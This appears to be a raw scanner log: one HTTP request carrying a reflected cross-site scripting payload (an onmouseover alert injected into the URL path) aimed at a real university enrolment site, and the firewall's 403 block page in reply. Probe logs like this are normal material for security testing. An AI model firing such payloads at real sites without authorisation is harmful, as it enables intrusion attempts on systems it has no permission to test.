[mamp-server-xss] Dumped HTTP request for https://enrolments.hildas.unimelb.edu.au/index.php/test"+onmouseover="alert(document.domain);"+style="font-size:100000px;background-color:white";


GET /index.php/test%22%20onmouseover=%22alert%28document.domain%29;%22%20style=%22font-size:100000px;background-color:white%22; HTTP/1.1
Host: enrolments.hildas.unimelb.edu.au
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


[mamp-server-xss] Dumped HTTP response https://enrolments.hildas.unimelb.edu.au/index.php/test"+onmouseover="alert(document.domain);"+style="font-size:100000px;background-color:white";

HTTP/1.1 403 Forbidden
Connection: close
Content-Length: 828
Cache-Control: no-cache, no-store
Content-Type: text/html
Set-Cookie: visid_incap_3211538=6YyfWHVNThG9tUwuld/qQwxyk2gAAAAAQUIPAAAAAAD4n8SyYE+vAeu4iqbaH2g+; expires=Thu, 06 Aug 2026 07:06:46 GMT; HttpOnly; path=/; Domain=.hildas.unimelb.edu.au
Set-Cookie: incap_ses_237_3211538=tAfSbGKrlRJ86barov5JAwxyk2gAAAAA8wgiviV+aPBkHIOuxJmh0Q==; path=/; Domain=.hildas.unimelb.edu.au
X-Iinfo: 7-6738224-0 0NNN RT(1754493453268 7) q(0 -1 -1 -1) r(0 -1) B15(1,402,42) U25

<html style="height:100%"><head><META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="initial-scale=1.0"><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"><script src="/Front-Night-supt-I-keepe-mans-his-rauing-it-of-N" async></script></head><body style="margin:0px;height:100%"><iframe id="main-iframe" src="/_Incapsula_Resource?CWUDNSAI=23&xinfo=7-6738224-0%200NNN%20RT%281754493453268%207%29%20q%280%20-1%20-1%20-1%29%20r%280%20-1%29%20B15%281%2c402%2c42%29%20U25&incident_id=237000430032587158-34375144431225543&edet=15&cinfo=01000000&rpinfo=0&mth=GET" frameborder=0 width="100%" height="100%" marginheight="0px" marginwidth="0px">Request unsuccessful. Incapsula incident ID: 237000430032587158-34375144431225543</iframe></body></html>
